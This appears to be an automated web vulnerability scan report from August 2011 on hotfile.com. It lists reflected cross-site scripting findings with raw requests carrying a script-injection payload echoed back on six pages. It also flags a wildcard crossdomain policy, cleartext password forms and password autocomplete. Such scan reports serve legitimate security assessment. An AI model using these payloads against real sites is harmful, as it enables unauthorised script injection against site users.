1. Cross-site scripting (reflected)
1.1. http://hotfile.com/ [name of an arbitrarily supplied request parameter]
1.2. http://hotfile.com/affiliate.html [name of an arbitrarily supplied request parameter]
1.3. http://hotfile.com/forgotpassword.html [name of an arbitrarily supplied request parameter]
1.4. http://hotfile.com/news.html [name of an arbitrarily supplied request parameter]
1.5. http://hotfile.com/news.html [name of an arbitrarily supplied request parameter]
1.6. http://hotfile.com/premium.html [name of an arbitrarily supplied request parameter]
3. Cleartext submission of password
3.2. http://hotfile.com/affiliate.html
3.3. http://hotfile.com/forgotpassword.html
3.4. http://hotfile.com/news.html
3.5. http://hotfile.com/premium.html
4. Password field with autocomplete enabled
4.2. http://hotfile.com/affiliate.html
4.3. http://hotfile.com/forgotpassword.html
4.4. http://hotfile.com/news.html
4.5. http://hotfile.com/premium.html
5.1. http://hotfile.com/premium.html
5.2. http://hotfile.com/premium.html
5.3. http://hotfile.com/premium.html
5.4. http://hotfile.com/premium.html
5.5. http://hotfile.com/premium.html
5.6. http://hotfile.com/premium.html
Severity: | High |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | / |
GET /?4c86d"><script>alert(1)< Host: hotfile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:07:25 GMT Server: lighttpd/1.4.26 Content-Length: 19901 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <a href="/?4c86d"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /affiliate.html |
GET /affiliate.html?35782"><script>alert(1)< Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com/news User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:09:15 GMT Server: lighttpd/1.4.26 Content-Length: 20678 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <a href="/affiliate.html?35782"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /forgotpassword.html |
GET /forgotpassword.html?264bb"><script>alert(1)< Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:09:14 GMT Server: lighttpd/1.4.26 Content-Length: 14344 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <a href="/forgotpassword ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /news.html |
GET /news.html?38030><script>alert(1)< Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:09:05 GMT Server: lighttpd/1.4.26 Content-Length: 18572 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <a href=/news.html?38030><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /news.html |
GET /news.html?81483"><script>alert(1)< Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:09:04 GMT Server: lighttpd/1.4.26 Content-Length: 18595 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <a href="/news.html?81483"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /premium.html |
GET /premium.html?33061"><script>alert(1)< Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:08:50 GMT Server: lighttpd/1.4.26 Content-Length: 19652 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <a href="/premium.html?33061"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: hotfile.com |
HTTP/1.0 200 OK Content-Type: text/xml Accept-Ranges: bytes ETag: "403596772" Last-Modified: Tue, 24 May 2011 11:54:45 GMT Content-Length: 223 Connection: close Date: Wed, 17 Aug 2011 01:07:21 GMT Server: lighttpd/1.4.26 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> < ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | / |
GET / HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:07:20 GMT Server: lighttpd/1.4.26 Content-Length: 19073 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <div id="loginFormMenu" class="form_login" style="display:none;"> <form action="/login.php" method="post"> <input type=hidden name="returnto" value="/"> ...[SNIP]... </label><input name="pass" type="password" class="textfield" /></p> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /affiliate.html |
GET /affiliate.html HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com/news User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:09:07 GMT Server: lighttpd/1.4.26 Content-Length: 19850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <div id="loginFormMenu" class="form_login" style="display:none;"> <form action="/login.php" method="post"> <input type=hidden name="returnto" value="/"> ...[SNIP]... </label><input name="pass" type="password" class="textfield" /></p> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /forgotpassword.html |
GET /forgotpassword.html HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:09:07 GMT Server: lighttpd/1.4.26 Content-Length: 13516 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <div id="loginFormMenu" class="form_login" style="display:none;"> <form action="/login.php" method="post"> <input type=hidden name="returnto" value="/"> ...[SNIP]... </label><input name="pass" type="password" class="textfield" /></p> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /news.html |
GET /news.html HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:08:56 GMT Server: lighttpd/1.4.26 Content-Length: 17537 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <div id="loginFormMenu" class="form_login" style="display:none;"> <form action="/login.php" method="post"> <input type=hidden name="returnto" value="/"> ...[SNIP]... </label><input name="pass" type="password" class="textfield" /></p> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /premium.html |
GET /premium.html HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:08:43 GMT Server: lighttpd/1.4.26 Content-Length: 18824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <div id="loginFormMenu" class="form_login" style="display:none;"> <form action="/login.php" method="post"> <input type=hidden name="returnto" value="/"> ...[SNIP]... </label><input name="pass" type="password" class="textfield" /></p> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | / |
GET / HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:07:20 GMT Server: lighttpd/1.4.26 Content-Length: 19073 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <div id="loginFormMenu" class="form_login" style="display:none;"> <form action="/login.php" method="post"> <input type=hidden name="returnto" value="/"> ...[SNIP]... </label><input name="pass" type="password" class="textfield" /></p> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /affiliate.html |
GET /affiliate.html HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com/news User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:09:07 GMT Server: lighttpd/1.4.26 Content-Length: 19850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <div id="loginFormMenu" class="form_login" style="display:none;"> <form action="/login.php" method="post"> <input type=hidden name="returnto" value="/"> ...[SNIP]... </label><input name="pass" type="password" class="textfield" /></p> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /forgotpassword.html |
GET /forgotpassword.html HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:09:07 GMT Server: lighttpd/1.4.26 Content-Length: 13516 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <div id="loginFormMenu" class="form_login" style="display:none;"> <form action="/login.php" method="post"> <input type=hidden name="returnto" value="/"> ...[SNIP]... </label><input name="pass" type="password" class="textfield" /></p> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /news.html |
GET /news.html HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:08:56 GMT Server: lighttpd/1.4.26 Content-Length: 17537 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <div id="loginFormMenu" class="form_login" style="display:none;"> <form action="/login.php" method="post"> <input type=hidden name="returnto" value="/"> ...[SNIP]... </label><input name="pass" type="password" class="textfield" /></p> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /premium.html |
GET /premium.html HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:08:43 GMT Server: lighttpd/1.4.26 Content-Length: 18824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <div id="loginFormMenu" class="form_login" style="display:none;"> <form action="/login.php" method="post"> <input type=hidden name="returnto" value="/"> ...[SNIP]... </label><input name="pass" type="password" class="textfield" /></p> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /premium.html |
GET /premium.html HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:08:43 GMT Server: lighttpd/1.4.26 Content-Length: 18824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <td> <form action="https://www <input type="hidden" name="cmd" value="_s-xclick"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /premium.html |
GET /premium.html HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:08:43 GMT Server: lighttpd/1.4.26 Content-Length: 18824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <td> <form action="https://www <input type="hidden" name="cmd" value="_s-xclick"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /premium.html |
GET /premium.html HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:08:43 GMT Server: lighttpd/1.4.26 Content-Length: 18824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <td> <form method="post" action="https://www <input type="hidden" name="ap_productid" value="zBE4Y/8C4MR8K ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /premium.html |
GET /premium.html HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:08:43 GMT Server: lighttpd/1.4.26 Content-Length: 18824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <td> <form method="post" action="https://www <input type="hidden" name="ap_productid" value="KVQMl1xj8bXgY ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /premium.html |
GET /premium.html HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:08:43 GMT Server: lighttpd/1.4.26 Content-Length: 18824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <td> <form method="post" action="https://www <input type="hidden" name="ap_productid" value="aJVESIaykHpph ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | /premium.html |
GET /premium.html HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive Referer: http://hotfile.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=62404277 |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:08:43 GMT Server: lighttpd/1.4.26 Content-Length: 18824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <td> <form action="https://www <div style="clear: both; height: -1px;"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://hotfile.com |
Path: | / |
GET / HTTP/1.1 Host: hotfile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-type: text/html Connection: close Date: Wed, 17 Aug 2011 01:07:20 GMT Server: lighttpd/1.4.26 Content-Length: 19073 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta content="text/html; ...[SNIP]... <div class="gray_backgronud"> <input type="file" name="uploads[]" class="upload_field" size=58/> </div> ...[SNIP]... |